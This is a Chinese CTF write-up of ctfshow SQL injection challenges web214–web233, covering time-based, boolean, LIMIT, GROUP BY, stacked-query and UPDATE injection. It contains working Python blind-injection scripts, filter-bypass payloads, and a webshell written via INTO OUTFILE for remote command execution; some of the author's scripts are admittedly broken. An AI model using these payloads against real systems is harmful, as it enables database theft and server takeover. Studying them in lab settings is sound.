web214-web253SQL注入篇(三)

2023/09/17 17:23:43

web214

时间盲注

终于知道是哪来的注入点了,在主页的网络包中有一个select.js中能看到:

$.ajax({
  url:'api/',
  dataType:"json",
  type:'post',
  data:{
    ip:returnCitySN["cip"],
    debug:0
  }

});

向其中可以存在注入点。
hackbar测试一下:
image.png
image.png
有sql执行,继续构建测试payload:

ip=if(substr(database(),1,1)=('c'),sleep(5),1)&debug=0

然后就是写脚本
先贴一下佬们的脚本:

"""
Author:Y4tacker
"""
import requests

url = "http://d23ee9e9-3e43-4b0a-b172-547561ea456d.chall.ctf.show/api/"

result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查列名字-id.flag
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        # 查数据
        payload = "select flaga from ctfshow_flagx"
        data = {
            'ip': f"if(ascii(substr(({payload}),{i},1))>{mid},sleep(1),1)",
            'debug':'0'
        }
        try:
            r = requests.post(url, data=data, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

我的脚本:

# -*- encoding: utf-8 -*-
"""
@File    :   SQL时间盲注1.py   
@Contact :   2997453446@qq.com
@Blog    :   natro92.github.io
 
@Modify Time      @Author    @Version    @Desciption
------------      -------    --------    -----------
2023/7/14 5:20   natro92      1.0         None
"""
import requests

url = r'http://6ec95228-b921-42dc-ba05-78d8a7decd79.challenge.ctf.show/api/'
flag_pre = 'ctfshow{'
str = "abcdefghijklmnopqrstuvwxyz0123456789{<>$=,;_-} "
# inside = 'database()'
# inside = 'select group_concat(table_name) from information_schema.tables where table_schema = database()'
# inside = 'select group_concat(column_name) from information_schema.columns where table_name = "ctfshow_flagx"'
inside = 'select group_concat(flaga) from ctfshow_flagx'

payload = 'if(substr(({}),{},1)=("{}"),sleep(1),1)'
res = ''
last = ' '

for i in range(1, 100):
    for j in str:
        data = {
            'ip': payload.format(inside, i, j),
            'debug': 0
        }
        # 看了Y4tacker佬的wp,看到这种写法,觉得太妙了。用try来微调
        try:
            r = requests.post(url, data=data, timeout=1)
        except Exception as e:
            last = res
            res += j
            break
        if last == res.replace(' ',''):
            exit()
    print(res)

注意

substr这个函数不从0开始,从1开始。别傻乎乎的用错了。
可以用try来做一个微调,如果出现问题就可以自己修改。
注意要传的是/api/不是/api传错了可没有回显

web215

提示用了单引号,得闭合一下就行
测试payload:

ip=1' or sleep(3) and '1'='1&debug=0
或者
ip=1' or sleep(3) #&debug=0

修改脚本:

# -*- encoding: utf-8 -*-
"""
@File    :   SQL时间盲注1.py   
@Contact :   2997453446@qq.com
@Blog    :   natro92.github.io
 
@Modify Time      @Author    @Version    @Desciption
------------      -------    --------    -----------
2023/7/14 5:20   natro92      1.0         None
"""
import requests

url = r'http://8f775fc1-f6d1-431e-9ac4-93ab0f082a11.challenge.ctf.show/api/'
flag_pre = 'ctfshow{'
str = "abcdefghijklmnopqrstuvwxyz0123456789{<>$=,;_-} "
# inside = 'database()'
# inside = 'select group_concat(table_name) from information_schema.tables where table_schema = database()'
# inside = 'select group_concat(column_name) from information_schema.columns where table_name = "ctfshow_flagxc"'
inside = 'select group_concat(flagaa) from ctfshow_flagxc'

payload = "1' or if(substr(({}),{},1)=('{}'),sleep(1),1)#"
res = ''
last = ' '

for i in range(1, 100):
    for j in str:
        data = {
            'ip': payload.format(inside, i, j),
            'debug': 0
        }
        # 看了Y4tacker佬的wp,看到这种写法,觉得太妙了。用try来微调
        try:
            r = requests.post(url, data=data, timeout=1)
        except Exception as e:
            last = res
            res += j
            break
        if last == res.replace(' ',''):
            exit()
    print(res)


注意

操作可以快一点,用一点快捷键。
pycharm中搜索快捷键ctrl + f,替换快捷键ctrl + r
搜索中修改正则:

http://[a-zA-Z0-9-./]+

然后替换写入新网址,这样就能快一点

web216

from_base64($id)

加了一个查询:

where id = from_base64($id);

只需要把1的base64 MQ==,添加的到原payload中:

ip='MQ==') or sleep(3) and '1'='1&debug=0

web217

benchmark函数的时间盲注

加了个过滤,把sleep给ban了,可以用benchmark代替。
BENCHMARK是SQL中的一个函数,主要用于测试SQL语句的执行效率。其语法如下:

BENCHMARK(count, expr)

其中count表示重复执行expr的次数。
这里的测试如下:

ip=1) and benchmark(500000,sha(1))#&debug=0

由于网络环境不同,需要根据情况下微调timeout的值:
这里我有点没太明白的点在于,为什么调用database函数时和查询时相同benchmark的延迟差很多

比如
ip=1) or if(substr((database()),1,1)=('c'),benchmark(500000,sha(1)),1)#
&debug=0
有1.45s
而
ip=1) or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)=('c'),benchmark(3500000,sha(1)),1)#
&debug=0
是1.72s

因此次数在脚本中需要多次调试。
而且由于这个时间是随着运行时间增长而会导致越到后面越不准确。
因此可以用limit关键字对flag进行分割。

# -*- encoding: utf-8 -*-
"""
@File    :   SQL时间盲注1.py   
@Contact :   2997453446@qq.com
@Blog    :   natro92.github.io
 
@Modify Time      @Author    @Version    @Desciption
------------      -------    --------    -----------
2023/7/14 5:20   natro92      1.0         None
"""
import time

import requests

url = r'http://b78d98e8-2199-4723-bf89-18fed148eb42.challenge.ctf.show/api/'
flag_pre = 'ctfshow{'
str = "abcdefghijklmnopqrstuvwxyz0123456789{-} "
# inside = 'database()'
# inside = 'select group_concat(table_name) from information_schema.tables where table_schema = database()'
# inside = 'select group_concat(column_name) from information_schema.columns where table_name = "ctfshow_flagxccb"'
inside = 'substr((select group_concat(flagaabc) from ctfshow_flagxccb),9,36)'

payload = "1) or if(substr(({}),{},1)=('{}'),benchmark(2500000,sha(1)),1)#"
res = ''
last = ' '

for i in range(1, 100):
    for j in str:
        data = {
            'ip': payload.format(inside, i, j),
            'debug': 0
        }
        # 看了Y4tacker佬的wp,看到这种写法,觉得太妙了。用try来微调
        try:
            r = requests.post(url, data=data, timeout=1)
        except Exception as e:
            last = res
            res += j
            break
        if last == res.replace(' ',''):
            exit()
        time.sleep(1)
    print(res)

观察之前的flag
ctfshow{c059a105-e0f9-41b5-a49e-002ac179386a}
从第九位开始七位,从17开始10位 从28开始12位

44n3955e
-cec3-
4c84-
bb3f-
91f5caab1040}
ctfshow{44n3955e-cec3-4c84-bb3f-91f5caab1040}
44239p5d-cec3-4c84-bb3f-91f5caab1040fb
4443955d

这道太折磨人了做的要死了。 我操了 注三遍三个结果,破b脚本跑了3个小时,还是用大佬们的二分法跑吧,这个也太慢了。

其他的时间盲注骚姿势

https://xz.aliyun.com/t/5505

笛卡尔积盲注

注入姿势

mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
+-----------+
| count(*)  |
+-----------+
| 113101560 |
+-----------+
1 row in set (2.07 sec)
 
 mysql> select  from ctf_test where user='1' and 1=1 and (SELECT count() FROM information_schema.columns A, information_schema.columns B, information_schema.tables C);
+------+-----+
| user | pwd |
+------+-----+
| 1    | 0   |
+------+-----+
1 row in set (2.08 sec)

mysql> select  from ctf_test where user='1' and 1=0 and (SELECT count() FROM information_schema.columns A, information_schema.columns B, information_schema.tables C);
Empty set (0.01 sec)

利用and短路运算规则进行时间盲注。

GET_LOCK盲注

get_lock函数官方文档中的介绍
ZZAQbT.md.png
可以看出文档中写的是我们如果已经开了一个session,对关键字进行了get_lock,那么再开另一个session再次对关键进行get_lock,就会延时我们指定的时间。
此盲注手法有一些限制,就是必须要同时开两个SESSION进行注入
SESSION A

mysql> select get_lock('lihuaiqiu',1);
+-------------------------+
| get_lock('lihuaiqiu',1) |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

SESSION B

mysql> select get_lock('lihuaiqiu',5);
+-------------------------+
| get_lock('lihuaiqiu',5) |
+-------------------------+
|                       0 |
+-------------------------+
1 row in set (5.00 sec)

 mysql> select * from ctf_test where user='0' and 1=1 and  get_lock('lihuaiqiu',2);
Empty set (2.00 sec)

mysql> select * from ctf_test where user='0' and 1=0 and  get_lock('lihuaiqiu',2);
Empty set (0.00 sec)

同样的盲注利用手法。

正则DOS RLIKE注入

延时原理,利用SQL多次计算正则消耗计算资源产生延时效果,其实原理是和我们的benchmark注入差不多的。
利用手法

mysql> select  from flag where flag='1' and if(mid(user(),1,1)='s',concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.)+(a.)+(a.)+(a.)+(a.)+(a.)+(a.)+b',1);
+------+
| flag |
+------+
| 1    |
+------+
1 row in set (0.00 sec)

mysql> select  from flag where flag='1' and if(mid(user(),1,1)='r',concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.)+(a.)+(a.)+(a.)+(a.)+(a.)+(a.)+cd',1);
Empty set (3.83 sec)

web218

笛卡尔乘积

benchmark也被禁用了,用笛卡尔积运算来达到延迟的目的
主要的语句是:

SELECT count(*) FROM information_schema.columns A, information_schema.columns B

拼接到payload里面测试一下:
不够就一直加,加到有延迟为止。
就不一点点爆了,直接梭。

# -*- encoding: utf-8 -*-
"""
@File    :   SQL时间盲注1.py   
@Contact :   2997453446@qq.com
@Blog    :   natro92.github.io
 
@Modify Time      @Author    @Version    @Desciption
------------      -------    --------    -----------
2023/7/14 5:20   natro92      1.0         None
"""
import time

import requests

url = r'http://f277bdb1-e417-43a9-a241-8a77c0cdaeff.challenge.ctf.show/api/'
flag_pre = 'ctfshow{'
str = "abcdefghijklmnopqrstuvwxyz0123456789_{-} "
# inside = 'database()'
# inside = 'select group_concat(table_name) from information_schema.tables where table_schema = database()'
# inside = 'select group_concat(column_name) from information_schema.columns where table_name = "ctfshow_flagxc"'
inside = 'substr((select group_concat(flagaac) from ctfshow_flagxc),9,36)'

payload = "1) or if(substr(({}),{},1)=('{}'),(SELECT count(*) FROM information_schema.columns A, information_schema.schemata B, information_schema.schemata C, information_schema.schemata D,information_schema.schemata E,information_schema.schemata F),1)#"
res = ''
last = ' '

for i in range(1, 100):
    for j in str:
        data = {
            'ip': payload.format(inside, i, j),
            'debug': 0
        }
        # 看了Y4tacker佬的wp,看到这种写法,觉得太妙了。用try来微调
        try:
            r = requests.post(url, data=data, timeout=1)
        except Exception as e:
            last = res
            res += j
            break
        if last == res.replace(' ',''):
            exit()
        time.sleep(1)
    print(res)

Rlike

select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');

正则语法:
. : 匹配任意单个字符
* : 匹配0个或多个前一个得到的字符
[] : 匹配任意一个[]内的字符,[ab]*可匹配空串、a、b、或者由任意个a和b组成的字符串。
^ : 匹配开头,如^s匹配以s或者S开头的字符串。
$ : 匹配结尾,如s$匹配以s结尾的字符串。
{n} : 匹配前一个字符反复n次。

RPAD(str,len,padstr)
用字符串 padstr对 str进行右边填补直至它的长度达到 len个字符长度,然后返回 str。如果 str的长度长于 len',那么它将被截除到 len个字符。
mysql> SELECT RPAD('hi',5,'?'); -> 'hi???'

repeat(str,times)  复制字符串times次
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/7/31
# blog: gylq.gitee.io
import requests
import time
bypass="concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'"
url = "http://4f04cb91-f6ed-43ce-bc4d-539d9c5b2a7b.challenge.ctf.show:8080/api/"
str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,,"
flag = ""
#1) and  if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',( concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),0)#
#求表payload = "1) and  if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',({}),0)#"
#payload = "1) and  if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxc'),{},1)='{}',({}),0)#"
payload = "1) and  if(substr((select group_concat(flagaac) from ctfshow_flagxc),{},1)='{}',({}),0)#"


n = 0

for i in range(0, 666):
    for j in str:
        data = {
            "ip": payload.format(i,j,bypass),
            "debug": '0'
        }
        start = time.time()
        res = requests.post(url, data)
        end = time.time()
        if end - start > 0.4 and end - start < 1:
            flag += j
            n += 1
            print('[*] 开始盲注第{}位'.format(n))
            print(flag)
            if j == "}":
                print('[*] flag is {}'.format(flag))
                exit()
            break

web219

//查询语句
where id = ($id);
//屏蔽危险分子
function waf($str){
    return preg_match('/sleep|benchmark|rlike/i',$str);
} 

同上题
直接跑就行。

# -*- encoding: utf-8 -*-
"""
@File    :   SQL时间盲注1.py   
@Contact :   2997453446@qq.com
@Blog    :   natro92.github.io
 
@Modify Time      @Author    @Version    @Desciption
------------      -------    --------    -----------
2023/7/14 5:20   natro92      1.0         None
"""
import time

import requests

url = r'http://6c19b909-06f4-412b-ba28-581287b784fc.challenge.ctf.show/api/'
flag_pre = 'ctfshow{'
str = "_abcdefghijklmnopqrstuvwxyz0123456789{-} "
# inside = 'database()'
# inside = 'select group_concat(table_name) from information_schema.tables where table_schema = database()'
# inside = 'select group_concat(column_name) from information_schema.columns where table_name = "ctfshow_flagxca"'
inside = 'substr((select group_concat(flagaabc) from ctfshow_flagxca),9,36)'

payload = "1) or if(substr(({}),{},1)=('{}'),(SELECT count(*) FROM information_schema.columns A, information_schema.schemata B, information_schema.schemata C, information_schema.schemata D,information_schema.schemata E,information_schema.schemata F),1)#"
res = ''
last = ' '

for i in range(1, 100):
    for j in str:
        data = {
            'ip': payload.format(inside, i, j),
            'debug': 0
        }
        # 看了Y4tacker佬的wp,看到这种写法,觉得太妙了。用try来微调
        try:
            r = requests.post(url, data=data, timeout=1)
        except Exception as e:
            last = res
            res += j
            break
        if last == res.replace(' ',''):
            exit()
        time.sleep(1)
    print(res)

web220

最后一个盲注了,赶紧做完赶紧润。
过滤了substr,可以用正则,left都可以。用limit代替group_concat()

# -*- encoding: utf-8 -*-
"""
@File    :   SQL时间盲注2.py   
@Contact :   2997453446@qq.com
@Blog    :   natro92.github.io
 
@Modify Time      @Author    @Version    @Desciption
------------      -------    --------    -----------
2023/7/14 13:25   natro92      1.0         None
"""
import time

import requests

url = r'http://2db91241-b5ab-4eec-9035-df2df4f18a46.challenge.ctf.show/api/'
flag_pre = 'ctfshow{'
str = "_abcdefghijklmnopqrstuvwxyz0123456789{-} "
# inside = 'database()'
# inside = 'select table_name from information_schema.tables where table_schema = database() limit 0,1'
# inside = 'select column_name from information_schema.columns where table_name = "ctfshow_flagxcac" limit 1,1'
inside = 'select flagaabcc from ctfshow_flagxcac'

payload = "1) or if(left(({}),{})=('{}'),(SELECT count(*) FROM information_schema.columns A, information_schema.schemata B, information_schema.schemata C, information_schema.schemata D,information_schema.schemata E,information_schema.schemata F),1)#"
res = ''
last = ' '
for i in range(1, 100):
    for j in str:
        data = {
            'ip': payload.format(inside, i, res + j),
            'debug': 0
        }
        try:
            r = requests.post(url, data=data, timeout=1)
        except Exception as e:
            last = res
            res += j
            break
        if last == res.replace(' ',''):
            exit()
        time.sleep(1)
    print(res)

其他脚本:

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/1
# blog: gylq.gitee.io
import requests
import time
bypass="select count(*) from information_schema.schemata a, information_schema.tables b, information_schema.tables c, information_schema.schemata d, information_schema.schemata e, information_schema.schemata f"
url = "http://d82b1a0b-aba4-4fed-aa83-62d59d7df4ee.challenge.ctf.show:8080/api/"
str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,,"
flag = ""
#1) and if((database())regexp('^ctfshow'),(select count(*) from information_schema.schemata a, information_schema.tables b, information_schema.tables c, information_schema.schemata d, information_schema.schemata e, information_schema.schemata f),0)#
#payload = "1) and if((database())regexp('^{}'),({}),0)#"
#payload = "1) and if((select table_name from information_schema.tables where table_schema=database() limit 0,1)regexp('^{}'),({}),0)#"
#payload = "1) and if((select column_name from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxcac' limit 1,1)regexp('^{}'),({}),0)#"
payload = "1) and if((select flagaabcc from ctfshow_flagxcac limit 0,1)regexp('^{}'),({}),0)#"



n = 0

for i in range(0, 666):
    for j in str:
        data = {
            "ip": payload.format(flag + j,bypass),
            "debug": '0'
        }
        start = time.time()
        res = requests.post(url, data)
        end = time.time()
        if end - start > 3 and end - start < 5:
            flag += j
            n += 1
            print('[*] 开始盲注第{}位'.format(n))
            print(flag)
            if j == "}":
                print('[*] flag is {}'.format(flag))
                exit()
            break

web221

https://www.jb51.net/article/99980.htm

limit注入 MySQL利用procedure analyse()函数优化表结构 这个题本质就是报错注入

$sql = select * from ctfshow_user limit ($page-1)*$limit,$limit;

注入点在get处,limit注入使用标准:
select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
修改为payload:

?page=1&limit=1 procedure analyse(extractvalue(rand(),concat(0x3a,database())),2)

image.png
直接交数据库名即可

web222

group by注入

直接在group by的位置注入即可

form.on('submit(*)', function(data){
    var table = layui.table;
    table.reload('user_table', {
      url:'api/?u=username'
    })
    return false; 
  });

  $sql = select * from ctfshow_user group by $username;

直接用时间盲注即可:
测试时会发现sleep的值会被方法二十倍。
?u=sleep(0.5)
image.png
然后就使用之前的时间盲注脚本即可。

# -*- encoding: utf-8 -*-
"""
@File    :   SQL时间盲注1.py   
@Contact :   2997453446@qq.com
@Blog    :   natro92.github.io
 
@Modify Time      @Author    @Version    @Desciption
------------      -------    --------    -----------
2023/7/14 5:20   natro92      1.0         None
"""
import time

import requests

url = r'http://0750fdff-bead-49bc-b6cb-501f23e1457d.challenge.ctf.show/api/?u='
flag_pre = 'ctfshow{'
str = "_abcdefghijklmnopqrstuvwxyz0123456789,{-} "
# inside = 'database()'
# inside = 'select group_concat(table_name) from information_schema.tables where table_schema = database()'
# inside = 'select group_concat(column_name) from information_schema.columns where table_name = "ctfshow_flaga"'
inside = 'substr((select group_concat(flagaabc) from ctfshow_flaga),1,48)'
payload = "if(substr(({}),{},1)=('{}'),sleep(0.05),1)"
res = ''
last = ' '

for i in range(1, 100):
    for j in str:
        try:
            r = requests.post(url=url + payload.format(inside, i, j), timeout=1)
        except Exception as e:
            last = res
            res += j
            break
        if last == res.replace(' ',''):
            exit()
    print(res)

web223(勾吧题,做破防了)

提示用户名不能用数字,因此可以用true代替,但是用true的代价就是一次循环20s,那就用布尔盲注代替。
看了wp发现使用的非常巧妙:
exp

if(true,username,false)

如果返回true时,就会执行group by username,导致参数变多:
image.png
而false时,返回false字符串,数据就相对较少:
image.png
因此可以做出盲注,构建脚本:
注意,这里过滤了数字1,因此只能用true代替。
给我杀了把 傻逼题,勾吧脚本真不知道哪错了:(这个脚本出不来,但是真不想改了)

# -*- encoding: utf-8 -*-
"""
@File    :   SQL布尔盲注3.py   
@Contact :   2997453446@qq.com
@Blog    :   natro92.github.io
 
@Modify Time      @Author    @Version    @Desciption
------------      -------    --------    -----------
2023/7/14 19:29   natro92      1.0         None
"""

import string
import requests
import time

def calculate_true(num):
    res = 'true'
    res += (num - 1) * '+true'
    # print(res)
    return res

def checkNum(s):
    if s in string.ascii_lowercase:
        return s
    elif s in '0123456789':
        return calculate_true(int(s))
    else:
        return None

url = r'http://364e23b2-79ce-4183-a604-8d8d1666bd18.challenge.ctf.show/api/?u='
flag_pre = 'ctfshow{'
str1 = "abcdefghijklmnopqrstuvwxyz0123456789{<>$=,;_ -}"
inside = "database()"
# inside = "admin'and+if(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)=('{}'),1,0)#"
# inside = "admin'and+if(mid((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'),{},1)=('{}'),1,0)#"
# inside = "admin'and+if(mid((select group_concat(f1ag) from ctfshow_flxg),{},1)=('{}'),1,0)#"
payload = 'if(substr(({}),{},1)=("{}"),username,false)'
res = ''
for i in range(1,100):
    for j in str1:
        nurl = url
        nurl += payload.format(inside, calculate_true(i), checkNum(j)).replace('1', 'true') # 1被过滤了,别忘了
        r = requests.post(nurl)
        # print(data)
        # print(r.json()['msg'])
        # print(nurl)
        # print(r.text)
        if 'AUTO' in r.text:
            res += j
            print(res)
            if j == '}':
                exit()

看看远处的正确脚本吧:

import requests
import time
url = 'http://90b8ab81-6a05-4ebc-ab88-62e8442c0e89.challenge.ctf.show/api/?u='
str = ''
def num2true(num):
    str = '(' + 'true%2b' * (num-1) + 'true)'
    return str
a = num2true(1)
# print(a)
for i in range(1, 60):
    min,max = 32, 128
    while True:
        j = min + (max-min)//2
        if(min == j):
            str += chr(j)
            print(str)
            break
        # 爆表名
        # payload = f"if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{num2true(i)},true))<{num2true(j)},username,true)"
        # 爆列
        # payload = f"if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'),{num2true(i)},true))<{num2true(j)},username,true)"
        # 爆值
        payload = f"if(ascii(substr((select group_concat(flagasabc) from ctfshow_flagas),{num2true(i)},true))<{num2true(j)},username,true)"
        r = requests.get(url=url+payload).text
        # print(r)
        if 'passwordAUTO' in r:
            max = j
        else:
            min = j
# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/1
# blog: gylq.gitee.io
import requests
#import time

def generateNum(num):
    res = 'true'
    if num == 1:
        return res
    else:
        for i in range(num-1):
            res += "+true"
        return res


url = "http://ce009cf2-8652-4737-ba07-b3bfc3bc3a4a.challenge.ctf.show:8080/api/"
str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,,"
flag = ""

#*************************************************************************************************************************************************************
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagas'"
#--------查flag
sql= "select flagasabc from ctfshow_flagas"
#*************************************************************************************************************************************************************
payload = "if(ascii(substr(({}),{},true))=({}),username,false)"


#计数
n = 0

for i in range(1, 666):
    for j in range(32,126):
        result_num=generateNum(i)
        result=generateNum(j)
        params = {
            'u' : payload.format(sql,result_num,result)
        }

        res = requests.get(url = url, params = params)
        if "userAUTO" in res.text:
            flag += chr(j)
            n += 1
            print('[*] 开始盲注第{}位'.format(n))
            print(flag)
            if j == "}":
                print('[*] flag is {}'.format(flag))
                exit()
            break
#ctfshow{728dd1b0-7547-401d-b358-2d2207f3d13c}

太重量级了,我拼个半天那个测试payload就是不对,true拼接咋拼咋不对,草泥马,傻逼sql注入你妈妈死了。
不用asci拼到substr里就是不行。

/api/?u=if(substr((database()),(true),true)=('c'),username,'a')

第一个就行
第二个就不行

http://000cd6ed-c9e2-47c0-8f98-045fe552c6cd.challenge.ctf.show/api/?u=if(mid((database()),(true+true),(true))=('c'),username,'a')

web224

似乎不是sql注入,而是文件上传。
实际上robots.txt能扫出来有修改密码的位置,修改密码之后登录是一个文件上传。20201128094552251.png
文件名注入,写入文件:

C64File "');select 0x3c3f3d60245f4745545b315d603f3e into outfile '/var/www/html/1.php'; --+

保存为:payload.bin其中十六进制为:<?=``$_GET[1]?``>,然后访问1.php传参1RCE。

/1.php?1=cat /flag

web225

handler,预处理

https://blog.csdn.net/solitudi/article/details/107823398
https://dev.mysql.com/doc/refman/8.0/en/handler.html handler官方文档

没过滤show字符:ctfshow';show tables;

{"code":0,"msg":"\u67e5\u8be2\u6210\u529f","count":1,"data":[{"id":"1","username":"ctfshow","pass":"ctfshow"},{"Tables_in_ctfshow_web":"ctfshow_flagasa"},{"Tables_in_ctfshow_web":"ctfshow_user"}]}

用handler读取:username=ctfshow';show tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;

{"code":0,"msg":"\u67e5\u8be2\u6210\u529f","count":1,"data":[{"id":"1","username":"ctfshow","pass":"ctfshow"},{"id":"1","flagas":"ctfshow{83599e7a-ba35-4ce6-88a1-6e1c69755ccb}","info":"you get it"}]}

至于什么是handler:

HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭,使用方法:

';handler `1919810931114514` open;handler `1919810931114514` read first#

预处理

预编译语句的优势在于归纳为:一次编译、多次运行,省去了解析优化等过程;此外预编译语句能防止 SQL 注入。 MySQL 预处理语句的支持版本较早,所以我们目前普遍使用的 MySQL 版本都是支持这一语法的。

PREPARE name from '[my sql sequece]';   //预定义SQL语句
EXECUTE name;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE name;  //删除预定义SQL        语句

字符串预处理:

PREPARE stmt1 FROM 'SELECT SQRT(POW(?,2) + POW(?,2)) AS hypotenuse';
ET @a = 3;
SET @b = 4;                                                   
EXECUTE stmt1 USING @a, @b;

变量定义预处理:

SET @s = 'SELECT SQRT(POW(?,2) + POW(?,2)) AS hypotenuse';
PREPARE stmt2 FROM @s;
SET @c = 6;
ET @d = 8;
EXECUTE stmt2 USING @c, @d;
DEALLOCATE PREPARE stmt2;

利用concat绕过过滤,然后将后面的database()替换为需要执行的语句。别忘记中间的空格。
payload:

?username=ctfshow';PREPARE aaa from concat('s','elect', ' flagas from ctfshow_flagasa');EXECUTE aaa;

或者用concat得到的连接字符也可以代替select:

?username=ctfshow';PREPARE aaa from concat(char(115,101,108,101,99,116), ' flagas from ctfshow_flagasa');EXECUTE aaa;

web226

我们之前在web224中的文件上传就使用了转换为十六进制然后将内容前加上0x。再加上预处理。
十六进制转换可以这样写:

text = "Hello World"

hex_str = ''
for ch in text:
    hex_ch = hex(ord(ch)).replace('0x','')
    hex_str += hex_ch

print("原文:\n"+text)
print("十六进制(不带0x):\n"+hex_str)
print("十六进制(带0x):\n"+"0x"+hex_str)

我们将需要预编译的语句转换为十六进制。然后再传入比如:
show被过滤掉了,不要出现。

十六进制前:
select database()
转换后:
0x73656c6563742064617461626173652829
加上预编译语句:
ctf';PREPARE aaa from 0x73656c6563742064617461626173652829;EXECUTE aaa;--+

然后再将中间的内容转换为需要的查询语句即可。
比如:

select table_name from information_schema.tables where table_schema=database()
?username=ctf';PREPARE aaa from 0x73656c656374207461626c655f6e616d652066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d64617461626173652829;EXECUTE aaa;--+

查列

select column_name from information_schema.columns where table_name='ctfsh_ow_flagas'
?username=ctf';PREPARE aaa from 0x73656c65637420636f6c756d6e5f6e616d652066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f6e616d653d2763746673685f6f775f666c6167617327;EXECUTE aaa;--+

查内容

select flagasb from ctfsh_ow_flagas
?username=ctf';PREPARE aaa from 0x73656c65637420666c61676173622066726f6d2063746673685f6f775f666c61676173;EXECUTE aaa;--+

就能查到flag了。

web227、web228-web230

https://blog.csdn.net/qq_41573234/article/details/80411079

他这里定义了自定义函数,所以需要去查询:information_schema.Routines这个:
其中的getFlag函数会调用flag 。也就是说直接1';call getflag()也可以
但其实这里已经显示出了flag:
image.png

web231

update盲注

这里需要开出来两个页面,一个负责修改(/api/),一个负责查看(/update.php)。直接修改内容,
比如在修改页面中传参:

password=1',username=database() where 1=1#&username=1

image.png
运行之后返回查看页面发现被更新了:
image.png
然后就依次插入查询语句:

password=1',username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where 1=1#&username=1
banlist,ctfshow_user,flaga
password=1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga') where 1=1#&username=1
id,flagas,info
password=1',username=(select flagas from flaga) where 1=1#&username=1
ctfshow{bda6ff95-49e5-4832-98ef-5f2156f74200}

web232

这个遇上一个的差别就是多个md5的括号需要闭合。

password=1'),username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where 1=1#&username=1
banlist,ctfshow_user,flagaa
password=1'),username=(select group_concat(column_name) from information_schema.columns where table_name='flagaa') where 1=1#&username=1
id,flagass,info
password=1'),username=(select flagass from flagaa) where 1=1#&username=1
ctfshow{d980485f-5f60-4558-a646-0c538bc3b9a1}

web233

盲注python。

//分页查询
$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
      
//无过滤

我们能注意到当输入密码的值为第一次出现时且正确时,后面的结果会出现
image.png
但是如果后面为0或者出现过一次则出现
image.png
编写脚本即可:

